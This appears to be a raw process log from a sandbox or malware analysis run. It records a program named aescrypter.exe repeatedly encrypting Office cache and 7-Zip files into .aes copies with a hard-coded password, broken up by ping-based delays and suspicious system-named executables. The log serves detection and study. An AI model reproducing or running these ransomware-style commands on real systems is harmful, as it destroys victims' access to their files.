C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml.aes" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml.aes" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml.aes" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml.aes" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\History.txt.aes" "C:\Program Files\7-Zip\History.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\af.txt.aes" "C:\Program Files\7-Zip\Lang\af.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\an.txt.aes" "C:\Program Files\7-Zip\Lang\an.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ar.txt.aes" "C:\Program Files\7-Zip\Lang\ar.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ast.txt.aes" "C:\Program Files\7-Zip\Lang\ast.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\az.txt.aes" "C:\Program Files\7-Zip\Lang\az.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ba.txt.aes" "C:\Program Files\7-Zip\Lang\ba.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\be.txt.aes" "C:\Program Files\7-Zip\Lang\be.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\bg.txt.aes" "C:\Program Files\7-Zip\Lang\bg.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\bn.txt.aes" "C:\Program Files\7-Zip\Lang\bn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\br.txt.aes" "C:\Program Files\7-Zip\Lang\br.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ca.txt.aes" "C:\Program Files\7-Zip\Lang\ca.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\co.txt.aes" "C:\Program Files\7-Zip\Lang\co.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\cs.txt.aes" "C:\Program Files\7-Zip\Lang\cs.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\cy.txt.aes" "C:\Program Files\7-Zip\Lang\cy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\da.txt.aes" "C:\Program Files\7-Zip\Lang\da.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\de.txt.aes" "C:\Program Files\7-Zip\Lang\de.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\el.txt.aes" "C:\Program Files\7-Zip\Lang\el.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\eo.txt.aes" "C:\Program Files\7-Zip\Lang\eo.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\es.txt.aes" "C:\Program Files\7-Zip\Lang\es.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\et.txt.aes" "C:\Program Files\7-Zip\Lang\et.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\eu.txt.aes" "C:\Program Files\7-Zip\Lang\eu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ext.txt.aes" "C:\Program Files\7-Zip\Lang\ext.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fa.txt.aes" "C:\Program Files\7-Zip\Lang\fa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fi.txt.aes" "C:\Program Files\7-Zip\Lang\fi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\PING.EXE

"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fr.txt.aes" "C:\Program Files\7-Zip\Lang\fr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fur.txt.aes" "C:\Program Files\7-Zip\Lang\fur.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fy.txt.aes" "C:\Program Files\7-Zip\Lang\fy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ga.txt.aes" "C:\Program Files\7-Zip\Lang\ga.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\gl.txt.aes" "C:\Program Files\7-Zip\Lang\gl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\gu.txt.aes" "C:\Program Files\7-Zip\Lang\gu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\he.txt.aes" "C:\Program Files\7-Zip\Lang\he.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hi.txt.aes" "C:\Program Files\7-Zip\Lang\hi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hr.txt.aes" "C:\Program Files\7-Zip\Lang\hr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\dcomcnfgui.exe

"C:\Windows\system32\dcomcnfgui.exe" -s

C:\Windows\SysWOW64\ucsvcsh.exe

"C:\Windows\system32\ucsvcsh.exe" -s

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hu.txt.aes" "C:\Program Files\7-Zip\Lang\hu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hy.txt.aes" "C:\Program Files\7-Zip\Lang\hy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\id.txt.aes" "C:\Program Files\7-Zip\Lang\id.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\io.txt.aes" "C:\Program Files\7-Zip\Lang\io.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\is.txt.aes" "C:\Program Files\7-Zip\Lang\is.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\it.txt.aes" "C:\Program Files\7-Zip\Lang\it.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ja.txt.aes" "C:\Program Files\7-Zip\Lang\ja.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ka.txt.aes" "C:\Program Files\7-Zip\Lang\ka.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kaa.txt.aes" "C:\Program Files\7-Zip\Lang\kaa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kab.txt.aes" "C:\Program Files\7-Zip\Lang\kab.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\Windows\SysWOW64\dcomcnfgui.exe

"C:\Windows\system32\dcomcnfgui.exe" -s

C:\Windows\SysWOW64\ucsvcsh.exe

"C:\Windows\system32\ucsvcsh.exe" -s

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kk.txt.aes" "C:\Program Files\7-Zip\Lang\kk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ko.txt.aes" "C:\Program Files\7-Zip\Lang\ko.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ku-ckb.txt.aes" "C:\Program Files\7-Zip\Lang\ku-ckb.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ku.txt.aes" "C:\Program Files\7-Zip\Lang\ku.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ky.txt.aes" "C:\Program Files\7-Zip\Lang\ky.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lij.txt.aes" "C:\Program Files\7-Zip\Lang\lij.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lt.txt.aes" "C:\Program Files\7-Zip\Lang\lt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lv.txt.aes" "C:\Program Files\7-Zip\Lang\lv.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mk.txt.aes" "C:\Program Files\7-Zip\Lang\mk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mn.txt.aes" "C:\Program Files\7-Zip\Lang\mn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mng.txt.aes" "C:\Program Files\7-Zip\Lang\mng.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mng2.txt.aes" "C:\Program Files\7-Zip\Lang\mng2.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mr.txt.aes" "C:\Program Files\7-Zip\Lang\mr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ms.txt.aes" "C:\Program Files\7-Zip\Lang\ms.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nb.txt.aes" "C:\Program Files\7-Zip\Lang\nb.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ne.txt.aes" "C:\Program Files\7-Zip\Lang\ne.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nl.txt.aes" "C:\Program Files\7-Zip\Lang\nl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nn.txt.aes" "C:\Program Files\7-Zip\Lang\nn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pa-in.txt.aes" "C:\Program Files\7-Zip\Lang\pa-in.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

